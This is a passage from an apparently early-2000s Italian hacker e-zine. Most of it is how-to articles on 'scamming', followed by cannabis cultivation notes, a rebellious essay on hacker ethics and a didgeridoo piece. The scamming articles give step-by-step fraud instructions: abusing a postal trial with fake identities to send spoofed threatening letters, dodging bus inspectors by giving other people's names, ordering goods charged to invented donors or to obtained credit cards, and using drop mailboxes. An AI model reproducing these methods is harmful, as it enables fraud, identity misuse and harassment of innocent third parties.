un bel film 'imperdibile' o qualche altra trasmissione demente che 
la gente non vuole perdere. 

>Funzionamento<

In pratica non avete fatto altro che sovraccaricare
la centralina TV che sta (generalmente) nel sottotetto del vostro 
palazzo.

bye
---]CyB0rG[---


---------------------------------------------------------------[ sKamMinG ]---
===] SPEDIRE POSTA CARTACEA DALLA NET A LIRE 0 ]==============================
-----[ mR_bIs0n ]-------------------------------------------------------------


Della serie....                 Enjoy skammin'
      
Roba de pazz!

Consumo: nulla
Musica ascoltata: Nirvana, Guano Apes, Guns 'n' Roses a palla
Saluti a: Biby, Guilecool, Carmine.
Fankulo a: Ceino Pompino

!!!Disclaimer!!!
Io, mR_bIs0n, sono la causa del vostro arresto o altri guai successi per aver
letto questo art... allora il mio vero nome  Alessandro Ceino. Denunciatemi
e insultatemi... (kiss perk il mio vero nome kambia ad ogni art...)

Beeeeeeeene raga'! Sono il solito rompi coglions di mR_bIs0n! Oggi vi ho
scritto un art su kome mandare posta cartacea via internet e senza pagare,
ovviamente...

Oki iniziamo... dobbiamo sapere innanzitutto ke ora le Poste Italiane hanno
implementato un servizio di posta via internet, kiamato InterPosta... bene
questo servizio serve a skrivere una lettera su internet, ke poi arriver al
destinatario su carta... heheheh... voi direte... MA SI PAGA??? Certo ke si
paga... ma possiamo farci un abbonamento di prova e mandare UNA SOLA
lettera... uffa... ma nessuno ci dice di non farci 3000 abbonamenti vero???
EHEHHE!!!

Oki vi collegate al sito www.interposta.com, andate nella sezione "Prova
Interposta", proseguite e immettete dati fasulli, ma attenzione! Nella
sezione della e-mail immettete una e-mail valida, magari creata poko prima
con, ke so', Yahoo! Mail... perk in quella kasella arriver un kodice da
usare... bene, fatto ci possiamo mandare una lettera... HIHIHHIHI il bello
sta ke possiamo benissimo settare il mittente della lettera!! HEEHHE sapete
quanti professori hanno mandato lettere minatorie al preside della mia
skuola???.... Stupendo...
Dopo massimo 3 giorni arriver al destinatario della lettera la busta e la
lettera appunto kos:

        __________________
        |\      @       /|  UN SERVIZIO DI POSTE ITALIANE S.P.A.
        |  \__________/  | ACCESSIBILE VIA INTERNET ALL'INDIRIZZO
        |   INTERPOSTA   |
        |________________|              WWW.POSTE.IT

                                REALIZZATO DA THURMA S.R.L.
                             VIA DEI PIATTI 4 - 20123 MILANO



                                                     IS35654
                                            Preside De Rinkoglionitis
                                            Liceo Scientifico
                                            GALILEO GALILEI
                                            Via degli scorreggi tonanti, 12
                                            00100 MILANO

                                            || || | |||||  | || || ||| |

                                            Prof. De Imbecillis
                                            Via delle Magliolie, 66
                                            00100 MILANO
                                            Italy
                                                        


Alli murtacci tui, kekka maledetta, ke ti spakkino la figa usando una katana!
(pankry rulezz)
....
Bene, ora ke vi siete divertiti volete farne altre... ma c' un problemino,
anzi pi:

dovete usare un altro abbonamento, di konseguenza, un'altra e-mail...
dovete kancellare tutti i kookies ke vi mette dal sito, perk i bastardi ci
vogliono fottere...

Pu sembrare un lavoraccio, ma in fondo  divertente!!!

Spero ke quest'art vi sia stato utile!!!
CIAO!

(In realt ho finito subito i saluti perk mi skappa di pisciare...)

---mR_bIs0n---

---------------------------------------------------------------[ sKamMinG ]---
===] IL BUS SKAMMING ]========================================================
-----[ The Raven ]------------------------------------------------------------

Bene, e' la prima volta che scrivo per AIS, anzi e' la prima volta che
scrivo per una zine (ho scritto pero' un cookbook, reperibile su
www.raven.3000.it -pubblicita' occulta?), sempre che il buon OldIron
decida di pubblicarmi... Dovrei avervi gia' rotto le palle a
sufficienza, quindi cominciamo.


Ah, il Bus, il Pullman, la Corriera... Un utile ed ecologico mezzo di
trasporto, comodo, veloce e quasi mai in ritardo. Ha un solo difetto:
il biglietto! Lo Skamming, come tutti dovreste sapere, e' l'arte di
ottenere oggetti o servizi in modo gratuito, legalmente o meno. Ebbene,
a meno che non vi regalino un abbonamento modi per scroccare il viaggio
in bus non ce ne sono (in modo legale intendo). Per prima cosa,
comprate (che brutta parola...) un biglietto, e fate una (meglio tre)
corse, per vedere i controlli che ci sono. Se c'e' il tipo che li fa
in corsa, o che li controlla in corsa, non c'e' scampo, e vi tocca
pagare. Ma in genere questo tipo di cose viene fatto nei treni oppure
nei bus estivi che portano al mare, per quelli urbani ed extraurbani
(almeno per la situazione che conosco io, cioe' l'ACAP di Pxxxxxxx e
la SITA della zona di Bxxxxxxxxxx) c'e' la makkinetta obliteratrice
nel bus e i biglietti non li controllano MAI. Io all'inizio compravo
regolarmente il tagliando, ma vedevo gente che non lo faceva. Pensai
che avessero un abbonamento, ma non era sempre vero. Allora ho
cominciato a tenere in tasca un biglietto obliterato (per mesi sempre
lo stesso), oppure timbravo 4 o 5 volte lo stesso. E non c'e' mai stato
un controllo. Fino a stamattina. Sono tre mesi ormai che non ho neanche
piu' il biglietto usato, e alla fermata chi ti trovo? Due controllori
ACAP. Questa e' la situa piu' difficile, me la sono vista brutta.
Innanzi tutto, SANGUE FREDDO: Calma, state tranquilli. I tipi vi
aspettano in strada, alla discesa, uno da una parte e uno dall'altra
della portiera di discesa. Allora, gia' qui due trucchi:

** SE LI VEDETE PRIMA DI SCENDERE
1) Uscite da una delle entrate e vi allontanate IN FRETTA MA SENZA
   CORRERE,
2) saltate la fermata e scendete alla successiva, tanto non salgono.

** SE NON VE NE ACCORGETE E VE LI TROVATE DAVANTI MA SIETE IN MOLTI
A SCENDERE.
Se avete la sfiga vi bloccano tra loro due, il bus e un muro. Quindi
cercate di scendere almeno i 7, se siete soli vedete dopo. Mentre
controllano i primi due o tre, voi cacciate il portafoglio e TOGLIETE
ogni documento di identita', mettetevelo in tasca o che so io. Poi
aspettate il momento in cui il controllore + lontano stia esaminando un
biglietto e accodatevi al tipo gia' controllato davanti a voi che se
ne sta andando, cosi' ho fatto io stamane. Certo che se avete un
biglietto, anche vecchio (intendo col timbro vecchio ma non deve
essere rovinato) e vi agitate facilmente, mostrateglielo di sfuggita e
andatevene.

** SE SIETE IN POCHI (2 o 3) OPPURE SOLI E SIETE GIA' SCESI
A questo punto avete diverse possibilita'.
1) La piu' facile: fate finta di non TROVARE il biglietto, e dopo date
   un nome falso (se proprio hanno voglia di rompere il cazzo). In
   teoria triplicano la multa (da 60mila a ben 180mila) se se ne
   accorgono, quindi voi dite di NON AVERE DOCUMENTI e andate tranqui.
   NON POSSONO frugarvi nel portafoglio, non hanno questo potere.
2) Fate finta di non trovare il biglietto (aprite il portafoglio,
   occhiata velocissima e via, oppure mostrate loro il vecchio) ma di
   andare ESTREMAMENTE di fretta, fategli capire che NON AVETE TEMPO DA
   perdere con queste stronzate e che avete un affare importante da
   concludere, li citerete x danni se fate tardi. Serve una buona dose
   di faccia tosta pero'.
3) Se siete veloci, SCAPPATE, MA VELOCE! Se vi bekkano poi date un nome
   falso, ma non sperate di farla franca facilmente.
4) Semplicemente dite di non averlo e andate via. Funziona solo se:
   a) Avete MOLTISSIMA faccia tosta
   b) Siete MOLTO PIU' GROSSI E AGGRESSIVI dei controllori
   c) Non c'e' gente in giro
   d) Girato l'angolo avete un posto dove nascondervi
   e) Quelli non hanno voglia di perdere tempo per 1500 lire
   Praticamente MAI!

Io continuo a viaggiare a sbafo quasi ogni giorno, tanto nella peggiore
delle ipotesi (in caso di controllo, finora uno su 400) pago 60/180mila
(sempre che mi ritrovassero col nome falso che gli darei, dovendone
dare uno: praticamente la farete franca in caso di controllo senza dar
nomi in 4 casi su 5) e gliene ho gia' sbafate oltre 600mila... Conosco
gente che e' "sopravvissuta" a 3 controlli (quelli che hanno fatto, non
uno "fallito") dando nome falso. E' talmente facile... Se volete
inventatelo, ma se c'e' una persona che vi sta sul kazzo usate il suo!
E' preferibile in tal caso conoscere anche il suo indirizzo.
Quindi, ricapitolando, ho 1 possibilita' su 1000 di pagare una multa
(sempre che mi trovino, of course) in ogni caso minore di quello che ho
risparmiato. Tutto questo usando il bus 5 volte a settimana,
soprattutto urbane ma prima facevo anche tratti extraurbani (stessa
situazione). Morale della favola, io gia' oggi pomeriggio ho viaggiato
di nuovo a sbafo... Uaz uaz uaz

PS Questo txt, come quelli sull'hacking, e' rivolto ai gestori ACAP
affinche' migliorino i controlli, e io non ho mai fatto davvero queste
cose... See come no... FOTTETELI SEMPRE E COMUNQUE! Enjoy the Skam!

the_raven@libero.it
www.raven.3000.it

---The Raven---

---------------------------------------------------------------[ sKamMinG ]---
===] LA TRUFFA POSTALE ]======================================================
-----[ mR_bIs0n ]-------------------------------------------------------------



Consumo: ho la brutta abitudine di iniziare gli art prima di mangiare... eheh
Abbigliamento: mutande (gialle davanti e marroni dietro) e kannottiera...
Musica ascoltata: un po'di tutto del momento... naturalmente in MP3!!!

Saluti a: Biby, Piccinni, Panino, Luigi, Faby e Simy (senn ki le sente...),
          qualkun'altro ke non rikordo, il kanale #Phreak.it, tutti quelli di
          AIS, XaRaBaS, gli operatori Telekom a kui ho rubato tanta roba...

Fankulo a: i prof. di merda, alla skuola bastarda, a tutti i Lamerini, a ki mi
           sta sul kaxxo...

Dedicato a: tutte le belle gnokke ke ci sono in Italia, e a quella scema
            dell'Ilaria ke prima di fidanzarsi kon qualkuno si fa le pere...
---

Beeeeeeeeeneeeeeeeee, kome va? Tutto bien? Vi state divertendo? Bravi...
Perk kazzo sto a dire ste kavolate???

 .------------------------------------.
| Indice                               |
| 1)Intro                              |
| 2)Truffa da casa propria             |  <--- Mitiko!!!
| 3)Truffa da casa altrui              |                
| 5)Karta di kredito                   |
| 6)Riski                              |
| 7)Kazzate ke mi verranno in mente... |
 -------------------------------------'

 - Intro
Oggi vi illustrer varie teknike per la truffa via posta... ovvero il
mail - truffing!!! Si, proprio, kos... farsi arrivare a kasa roba senza
pagarla, ovviamente...
Non uso disclaimer, quindi se i carabinieri o kikkessi vi arrestano per
quello ke avete fatto leggendo qui (per fare un esempio, mettiamo ke avete
letto kome fare a farsi un abbonamento ad una rivista, e voi vi fate una pera)
io sono il responsabile, il mio nome  Fabio Fanizza, oppure se vi piace di +
Giuseppe Pasanisi, ditelo pure!!!
A parte gli skerzi a me non me ne pu fregare un kazzo, tanto la pula o i
carramba o quegli str***i della G.D.F. non sann nulla di me! AHAHAH (risata
sadika)...

 - Truffa da casa propria
Oki, la truffa da casa propria consiste nel far arrivare della roba a casa
vostra... voi direte "ceeeeeerto! E la pago io!" NO! E'qui ke vi sbagliate,
infatti i metodi ke vi illustrer faranno in modo ke voi non centriate un
benamato kazzo...
Bene, mettiamo ke volete abbonarvi a Topolino... A TOPOLINO??? Ma ke kazzo
leggete? Evidentemente avete avuto problemi da pikkoli... dicevamo? Ah si!
Volete abbonarvi a Topolino, bene non dovete fare altro ke trovare una
kartolina d'abbonamento nelle riviste o nel Topolino stesso... ma attenzione!
La cartolina deve essere di quelle ke possono regalare l'abbonamento! EHHEHE!
Cio, una persona (es. Fabio Fanizza) vuole regalare un abbonamento a Topolino
(casualmente) a voi... bene questa kartolina lo permette! BENE!!! Quindi kol
fidato GenerID riempiamo la cartolina kon le generalit del "donatore", mentre
nella sezione "donato" mettiamo i nostri datucci!!! Fatto? Bravi! Ora kome
modalit di pagamento usiamo i bollettini, quanti pi possibili! Mirakkomando
usate un paesino sperduto magari nella Valle D'Aosta per la residenza del
"donatore"!!! Presto vi arriver il vostro amato giornalino (ma Topolino se la
scopa mai Minnie???)!
Sikkome avete ordinato una kosa ke arriva ogni settimana, forse potrebbero,
quei bastardi della Walt Disney Italia, accorgersene ke i soldi non
arrivano... e potrebbero non inviare + un caxxo... bastardi...
Il bello di tutto sta ke voi non centrate davvero un caxxo! Infatti non avete
rikiesto voi l'abbonamento quindi siete puliti! Se poi qualkuno (ignoro ki) vi
akkusa di averlo rikiesto voi potrete sempre dire: "Kekazzvuoi?
(Questo  opzionabile), Kiunkue avrebbe potuto fare l'abbonamento per farmi
uno skerzo! Fottiti (Idem)"...
Mettiamo ora ke ora avete visto una kosa ke vi serve ma nella kartolina non
c' la sezione del "donatore"... ke bastardi... vabb poko male... leggete +
avanti...

 - Truffa da casa altrui
Bene, volete komprarvi qualkosa o farvi abbonamento a kualkos'altro... nulla
di + facile se per puro kaso avete qualke vostro amiko ke abita in un
kondominio... ehehheh sapete ke ci sono tantiiiissssiiimeee cassette di
posta... bene baster usarne una libera e appicircarvici un nome a cazzo
(Es. Giuseppe Pasanisi)... fatto ci fate in modo ke la roba rikiesta sia
pagata tramite bollettini... eheheh il gioko  fatto!!!

Skusate devo pisciare...
fatto!
Mi  venuta fame (non mi sono nemmeno lavate le mani... hiihihih)

Lettore skoglionato : "Ma ke palle! Mo'in mezzo all'artikolo questo si mette a
                       a mangiare senza nemmeno lavarsi le mani..."
Vabbene!

Dicevamo per kaso ke un ragazzo non pu pi divertirsi dopo essere andato a
Teatro??? Ah no!

Oki, ma mettiamo ke kuello ke volete purtroppo kosta parekkio e bisogna
pagarlo o per contrassegno (soldi in contanti al corriere) o per karta di
kredito... leggete + avanti...

 - Karta di kredito
Bene, bene... questo metodo  mooolto teoriko, per il fatto ke per avere una
karta di kredito ce ne vuole... comunque per prokurarsela leggetevi l'art di
XaRaBaS su NewBies 5... oppure hackate visa.com kome mio cuggino...
bene una volta avuta questa benedetta karta non dovete fare altro ke trovare
una buona ubikazione per fare arrivare la roba... per esempio in un
kondominio... bene, ora fate l'ordine, ma attenzione utilizzate una generalit 
fasulla... poi non mettete nessun numero telefoniko... se per ricevere la
roba c' bisogno di essere rikiamati, kiamate da kabina voi dicendo ke per
motivi di lavoro non avete il telefono a kasa... bene... dite anke ke per la
roba deve arrivare possibilmente verso un certo orario e giorno (a voi +
comodi), tanto kon la karta potete rikiedere kualsiasi metodo di spedizione!
IHIHIHIH!!! Pure kuello ke ti arriva entro 1 giorno... eheheh tanto mika
pagate voi! Una volta fatto tutto aspettate sotto nel kondominio il corriere
firmate e vi portate via la roba...

 - Riski
Bene, dovete sapere ke per il metodo di truffa da casa, non ci sono problemi,
se proprio volete essere sikuri, kiamate l'ufficio abbonamenti della rivista
o giornale ke sia e fatevi spedire un fax dove dice ke voi non centrate un
kazzo kon la roba ke vi arriva regalata...
Per la truffa da casa altrui, invece, il diskorzo kambia... non usate sempre
la stessa ubikazione, state attenti a quei bast***i della G.D.F.... per
essere sikuri fate saltare in aria la loro kaserma del ka**o...
Per la karta di kredito state molto attenti... se fate un ordine da Internet
allora non basta usare un proxy... vedete un po'voi... se lo fate da
kartolina, da telefono (kabina ovviamente), fax (anonimo) o altro ke 
assolutamente anonimo va bene... Non siate stupidi...


 - Kazzate ke mi verranno in mente
Oki siamo arrivati alla fine dell'art... vi ringrazio tutti quanti i miei
ammiratori... alle ammiratrici (tre: una celebro-lesa, una kon gravi
malformazioni all'alluce del piede destro e una ke si krede McGyver e kon un
temperino e un rotolo di scotch mi costruisce un cellulare satellitare...)
(spero ke non ci siano lettori ke potrebbero offendersi per il fatto ke sono
celebro-lesi, o ke abbiano malformazioni all'alluce del piede destro o ke si
kredono McGyver... skusate)
Mo'ke vi diko +??? Kazzo sono le 3.15 e ci il corso di potenziamento di
matematika... seeeeee corso di rekupero!!!
Quindi vi saluto e vi lascio una favoletta ke non centra un kazzo kon tutto!

La volpe, il gatto e la iena
Un bel giorno una volpe e un gatto si contendevano un pezzo di karne
di allevamento proveniente da Cernobil... mentre bisticciavano una iena,
rapidamente, tolse il pezzo di karne e lo inghiott andandonese allegro
allegro! Morale della favola, tra i due litiganti il terzo muore intossikato.

CIAOOOOOOOOOOOOooooooooooooo.............

---mR_bIs0n---

--------------------------------------------------------------[ gArDenInG ]---
===] MODALITA' DI SEMINA ]====================================================
-----[ zio`sP3nky ]-----------------------------------------------------------


Autore : zio`sP3nky 
Mail : sp3nky@freemail.it

Un saluto a tutti i centri sociali di Roma ( vi pasto st file dovesse
tornarvi utile ) :


-[NDR: La Lista dei CS di Roma si trova alla fine dell'e-zine]-


/me pensa : <<...Oi! ke faticaccia!!!>>

Saluto di + michell9&Yoghi, valv0, N0bodY, Dante Alighieri ,smav ed anke
#ahccc ( lili1,Axis,Dvd,TheDuke,vecna,Vaffa,loox,Lubna,Dalila,Jammina,vj e poi
le altre 2 svizzere ke non rikordo kome si kiamano  :\ )

Dedicato all'Elisa e ai girasoli..

Dunkue dunke....mettiamo le kose in kiaro....non ho potuto studiare l'SS7 e
ora vi leggete kuesto stupendo artikolo sul " Giardinaggio di zio`sP3nky ".
Contenti?!?

/me non sente gli applausi...

Vabb...spero ke almeno lili1 lo legga... ( ciao lili :* ) 

Essendo cresciuto in mezzo all'erba ( da fum :) ) mi  sempre piaciuto vedere
le piante...in casa , all'aperto , etc etc....

Mi hanno sempre fatto cagare le piante comprate...perk non l'ho fatte nascere
io....
Apparte kuesto si komicia...

z0e : si komincia a far ke?
zIo : boh...

Vediamo vediamo.....a giugno potreste piantare ankora i girasoli..davvero
belli no?..provateci ma  tardi....oppure potete piantarvi una pianta di
zukkine....ke  molto decorativa e buona ( se non vi piacciono i fiori fritti
andate a farvi fottere >:\ ) .

]---> Le piante a seme.

Per far crescere una pianta ( e non solo kuelle di maria ) mika metterete i
semi a terra subito , no ?!?

z0e : ah!!! ekko perk l'anno passato su 1o semi di maria sono uscite 2  
      piante di kuasi maria !!!
zIo : brava strunza. zIo d0cEt.


Kuindi mettere i semi a mollo in un bikkiere d'ackua fink non escono delle
pikkole radicine bianke dalla parte + "appuntita" del seme.Inoltre dovrete
cambiare l'ackua ogni tanto e non fate i koglioni ke fate lessare i semi al
sole...metteteli in un posto fresko dove l'akua non possa riskaldarsi + di
tanto ( es. accanto al picc...sulla lavatrice, lavastoviglie etc etc ).

Okkei okkei..datemi un attimino ke lancio un bestemmione a dei ragazzini per
terrorizzarli ( stanno facendo dei gavettoni ).

z0e : Maddai li hai fatti piangere!!!
zIo : ...

Ummh...( nel mentre m' venuta l'idea di fare il lancia gavettoni a casa )....
Okkei...mette i semi in terra kon la puntina bianka verso il basso in un
vasetto pikkolo....un seme per un vaso..non di pi....usate solo

z0e : Tena Lady
zIo : ...makk kazzo centra?!?

...dei vasetti pikkoli pikkoli....e annaffiate regolarmente e solo kon uno di
kuei kosi...ke si kiamanano nebulizzatori.

Annaffiate SOLO di mattina kuando f fresko oppure di sera!!! Altrimenti
l'ackua nei vasi si riskalda e le piante si ustionano in un certo senso...

Kuando le piante saranno abbastanza grandine.....e il vaso gli star un p
stretto...( ve ne potrete accorgere se sotto al buko del vaso spuntano le
radici )...sar ora di kambiare vaso....se avete del terreno a casa mettetele
a terra....senno mettetele in un vaso + grande possibilmente di koccio
(kuelli arancioni...).

Concimate la pianta kon kualke koncime ke si mescola kon l'ackua....ma non
mettecene troppo ke senno la pianta si rinkoglionisce e muore.

]---> Parti di Piante ke vi inkulate x strada.

Semplicissimo....basta inkularvi il rametto....( prendete i rami + giovani....
lo rikonoscete dal kolore verde + kiaro... ) e mettetelo nell'ackua fink non
vi spuntano le radici....ovviamente mettete il tutto a l'ombra ed  meglio se
ci mettete una gocciolina di concime dentro.

lasciate ke le radici siano un bel p lunghe e mettetelo nella terra....
annaffiate regolarmente!!!

]--->  Piante a Tuberi.

Una delle pi comuni piante a tubero  la

zIo : Figa di z0e!!!  :P
z0e : Peccato stasera avevo un programmino e te lo 6 fatto  
      sfumare....
zIo : Oi!z0e dai io skerzavo...

Patata....oppure i gigli....l'amarillis (  a cipolla... ) etc etc

Pigliate la patata e la mettete a terra e annaffiate --> 'na kazzata!
 

Rikordo ke la pianta  una kosa vivente..non solo una semplice kosa di
abbellimento!!!!

---zio`sP3nky---

-----------------------------------------------------------------[ nArcO$ ]---
===] DISTINZIONE DEI SESSI ]==================================================
-----[ OldirOn61 ]------------------------------------------------------------

Buon Salve a tutti!!!!
Dopo aver spiegato come far crescere e come fertilizzare correttamente le
nostre amate piantine, passiamo alla fase piu' delicata ed inportante del 
ciclo di crescita della Canapa: la fioritura e la conseguente distinzione dei
sessi.

Perche' e' cosi' importante??? Semplicemente perche' grazie alla fioritura
riusciremo a distinguere le piante maschili da quelle femminili, che come gia'
detto nei precedenti numeri di AiS, contengono una percentuale di THC molto +
elevata di quelle maschili....

Dopo circa 6/10 settimane in cui le piante sono soggette ad un fotoperiodo
lungo (circa 16/18 ore di luce giornaliere) e' necessario "accorciare" il
fotoperiodo stesso a circa 12/13 ore di luce al giorno...
In questo modo la canapa comincera' a fiorire, ed a seconda del proprio sesso,
fiorira' in una delle due varianti, che ora spiegero'.

=] PIANTE MASCHILI [=

I fiori maschili si trovano in piccole pannocchie ascellari, e sono formate
da circa 5 sepali gialli o rossi, che si aprono dopo aver raggiunto la 
maturita' (6/8 settimane di vita) per lasciar cadere il polline contenuto
negli stami.

=] PIANTE FEMMINILI [=

I fiori femminili si rinoscono tramite un enorme ingrossamento dell'embrione,
che a mano a mano si trasformera' in una sorta di calice affusolato, da cui
nasceranno due pistilli, il cui colore puo' essere bianco, giallo o rosso.
In realta' non sembrano fiori, bensi' piccole foglie che formano pistilli a
spessi grappoli....
I pistilli non servono ad altro che catturare il polline delle piante maschili
necessario per far fecondare l'ovulo femminile, posto all'interno del calice.


A questo punto sara' necessario fare una scelta:

1)
Far impollinare le piante femmnili per far nascere semi, con conseguente
perdita di potenza (Circa il 10% del THC incluso nella pianta viene perso con
la produzione di semi);

2)
NON permettere alle piante maschili di impollinare quelle femminili per fare
un raccolto di "sinsemila" (Dallo spagnolo= senza semi), con un raccolto
decisamente + potente rispetto alla prima opzione. In questo caso e' 
NECESSARIO
separare le piante femminili da quelle maschili (Leggasi: trasferirfe i maschi
in un altro posto, o viceversa) in modo da impedire l'impollinazione.

Consiglio la prima opzione per chi vuole intrapendere per l'anno prossimo
un'altra coltivazione ed e' a corto di semi, mentre la seconda scelta e'
dedicata a chi non ha problemi di disponibilita' di semi per l'anno prossimo
...

In caso di + piante femminili, consiglio vivamente di adibirne 1 a produzione
di semi, e le restanti invece a "sinsemila", in modo da avere un OTTIMO
raccolto in fatto di potenza, e contemporaneamente una discreta quantita' di
semi per l'anno prossimo...

Per chi non ha problemi di spazio, e coltiva al chiuso, esiste un'altra 
possibilita': la crescita di "cloni" della pianta femmina, attraveso
le TALEE
Che cosa sono le TALEE??

In pratica le talee sono delle "porzioni di pianta madre" che, grazie al 
contatto con l'acqua 24h su 24, cominciano un ciclo di radificazione...

Praticamente, "sacrificando" una pianta femmina per fare una 10ina di talee,
in circa un paio di mesi avrete ben 10 PIANTE FEMMINILI DELLO STESSO
IDENTICO TIPO DELLA PIANTA MADRE!!!!

Bella svolta eh?
Comunque questo argomento verra' discusso nel prossimo numero...

---OldirOn61---                           

---------------------------------------------------------------[ ThInKinG ]---
===] THE DIFFERENCE MACHINE ]=================================================
-----[ aWAy3 ]----------------------------------------------------------------


Intro:
"Basta che non fai quello che fanno gli altri". Queste erano le parole
di risposta di un uomo, un insegnante di lettere - forse pi famoso
dei suoi colleghi, alla domanda insolita e spontanea di un allievo che
chiedeva cosa fare per non trovarsi tanto male nella vita.
"Ma cos' che fanno tutti?" pens quell'allievo.
Molto tempo dopo, quelle parole ritornarono alla mente di quel ragazzo,
quando vide che gran parte della gente era contro quell'insegnante:
tutto perch aveva scritto un libro ritenuto scandaloso, "Ragazzi di
vita". Quell'uomo era stato perseguitato, trascinato davanti ad un 
tribunale. Ogni cosa che egli faceva creava scandalo.
Allora quel ragazzo pens, che se il suo professore avesse fatto tutto
ci che gli altri fanno e avesse detto tutto ci che gli altri dicono,
nessuno si sarebbe mai accanito contro di lui in quel modo.
Questo bast per capire da che parte schierarsi...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

La maggior parte della gente non  libera. Vive in una societ plasmata
secondo standard imposti dai media e da un sacco di altre cazzate.
E' veramente comodo (ma chi ci riesce? e chi vuole riuscirci??) stare
in quello stampo, tutti 'uguali' e tutti magnificamente alla moda.
Tutti dalla parte della ragione, perch semplicemente dalla parte della
maggioranza. 

Poi c' una minoranza. 
Una minoranza che se ne fotte delle regole imposte da un falsi
moralismi, che rifiuta e combatte le leggi ingiuste, che grida ogni
giorno con i propri mezzi in faccia ai propri governanti la propria
'sudicia' opinione.
Sono musicisti, anarchici, semplici studenti incazzati, hacker,
cracker, in una parola: cyberpunk.
Non fanno quello che fanno tutti: ognuno esprime con i propri mezzi
(dalle manifestazioni, alla musica, al crackare un sistema..) il proprio
disappunto nei confronti di qualcosa che non va.
Qualcosa che ci vuole tutti uguali - modelli - modellati - in uno
standard industriale talmente facile da gestire..."just another brick
in the wall" dicevano musicisti di trent'anni fa quanto mai attuali...
Siamo tutti diversi, manteniamo ognuno la propria diversit, la propria
identit, il proprio stile.....cazzo, ho riletto fino a qui e ho visto
che ho usato troppo la parola "proprio" : non a caso comunque,  questa
la parola che mai nessuno vorrebbe sentirci dire, negano ad ogni
individuo la propria personalit, indipendenza.
La libert agli occhi dei pi potrebbe essere: essere tutti uguali,
non essere criticati, mal visti, emarginati, perseguitati, denunciati, 
uccisi...ma non  cos.
La libert per me e per altri  un'altra cosa:  creare una piccola
macchina, una macchina della differenza, per creare un p di caos in 
questa cazzo di costruzione che vuole apparire cos perfetta che si
chiama Governo, Societ, Stato, Chiesa e in chiss quanti altri modi.
La dIffERenCe mAChINe lavora ogni giorno grazie ad ognuno di noi
per la libert di pensiero, di azione, di informazione.
E se qualcuno fa un virus, hacka un sistema (senza far danni, se non
necessario, perch l altrimenti ci confondiamo con l'altra parte...)
non condannatelo: chiedetevi il perch lo fa, scavate a fondo, forse
troverete un piccolo tesoro, un meccanismo che brilla al sole, una
dIffERenCe mAChINe.

E' tempo di scegliere da che parte schierarsi...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Outro:
Un ringraziamento particolare a quel professore, Pier Paolo Pasolini,
a quel ragazzo che  cresciuto e ha scritto un articolo davvero bello, 
che poi mi ha portato a scrivere questo, Vincenzo Cerami, e a tutti 
quelli che contribuiscono ogni giorno alla nascita e alla vita di
infinite "dIffERenCe mAChINe".
best regards,

www.nails.cjb.net
away@subdimension.com

---aWAy3---

---------------------------------------------------------------[ ThInKinG ]---
===] UN PO' DI ETICA ]========================================================
-----[ ValK ]-----------------------------------------------------------------


Eccomi qui ;) 17 anni pieno di belle speranze e di ottimi presupposti, eppure
della vita non so' nulla, 2000 anni di storia della nostra civilta',
[ndr neanke fosse la sacra scuola di okuto] e nessuno ha dato un perke' o un
kome sulla vita.

E gia', sento il predicatore in kiesa dire una marea di kazzate su un dio
buono che ci fa' scannare tra di noi e ce lo fa' fare xche' ci vuole bene,
dall'altra parte sento parlare di reincarnazioni e obbiettivi da raggiungere,
ma la realta' e' una, tutte queste religioni, tutte queste false credenze,
sono un pietoso tentativo dell'uomo di dare un perke' a tutto questo di capire
cosa e' akkaduto e perke' siamo qui, senza comprendere che non per forza il
perke' di debba essere, vorrei sapere dove e' scritto che io ho un obiettivo
su questo ammasso di Carbonio, Zinco, Ferro, Idrogeno, Ossigeno, Silicio,
Calcio, io nella mia ottusita' di Carbonio legato ad atomi di ossigeno (perke'
e' questo ke siamo), non vedo la necessita' di un incentivo, qualkuno ha detto
"io penso quindi sono" ma nessuno ha detto e provato che per pensare debbo
avere un perke', e' solo la sfrenata curiosita' dell'uomo a cercare perke'
non necessari.

Guardandomi ora mi dico: " MA XCHE' KAZZO HO STUDIATO TANTO E SON ARRIVATO
DOVE SONO ARRIVATO? " e la risposta non la avro' mai nessuno me la puo' dare
e nessuno me la dara'.

E se tutto questo ,se l'aggregato di carbonio e silicio su kui ho passato 9
anni della mia vita, non fosse reale? se non fosse questa la nostra vita? cosa
saremmo noi in realta'? beh io ho pensato se io non fossi quello che sono
sicuramente sarei qualkos'altro ;)
Guardiamoci ora, cosa ci spinge a violare sistemi a studiare nuovi exploit a
trovare nuove strade ? la stessa curiosita' che ha spinto heinstein a studiare
l'atomo la stessa voglia di scoprire che ha spinto Madamme Curie a scoprire
la radioattivita' la stessa spinta che mi ha portato ad avvicinarmi alla
sicurezza informatica ci porta a dio? o kome kaspita lo vogliamo kiamare?
secondo me no, ma il dialogo e' aperto ...

E allora? perke' dovrei avere un etica rispettare la privacy e tutte le altre
kazzate introdotte dall'uomo? ke diritto ha un altro uomo di dirmi cosa e'
giusto fare e cosa no?

IO FACCIO TUTTO QUELLO CHE MI VA' PURKE'FACCIA IL MIO BENE

ecco la mia filosofia, io rispetto l'etika e l'etiketta xche' mi va' di farlo,
me se non dovessi piu' accettare le regole imposte dall'etica non esiterei un
solo attimo ad abbandonarla.

Quindi fate come vi pare io non vi diro' cosa e' giusto fare vi diro' solo
quello che PER ME e' giusto fare poi voi accettate, fregateve, mandatemi a
fanculo, a me di voi non me ne strafrega nulla.
				
valkzone@infinito.it
http://valkzone.tsx.org

---ValK---

--------------------------------------------------------------[ aLt.mUsiK ]---
===] COSTRUIAMO UN DIDGERIDU ]================================================
-----[ zio`sP3nKy ]-----------------------------------------------------------

Saluto e dedicato a : Elisa , michell9&Yoghi , valv0 , NobodY ,Martyr e    
                      lili1.

Il Didgeridu  uno strumento a fiato rikavato da un ramo di eukalipto svuotato
dalle termiti. Nonostante la sua semplicit pu produrre un'ampia variet di
ritmi suoni e timbri.

Il canto  la forma dominante nella cultura degli aborigeni australiani:
accompagna sia rituali informali ke rituali sacri.

Nell'Australia settentrionale il suono ronzante del didgeridu costituisce un
rikko accompagnamento alle voci.

( Almeno kos dice l'Encarta98 )

P.s. Avete mai sentito Co.Dex di Giovanni Lindo Ferretti?!?...mbh all'inizio
     di una kanzone ( non rikordo kuale) c' un didgeridu campionato....

Io almeno non ho l'eucalipto....anke se in zone tipo Salerno si trova
l'eucalipto ( sta sui lati delle strade kuasi sempre ). Peccato ke in Italia
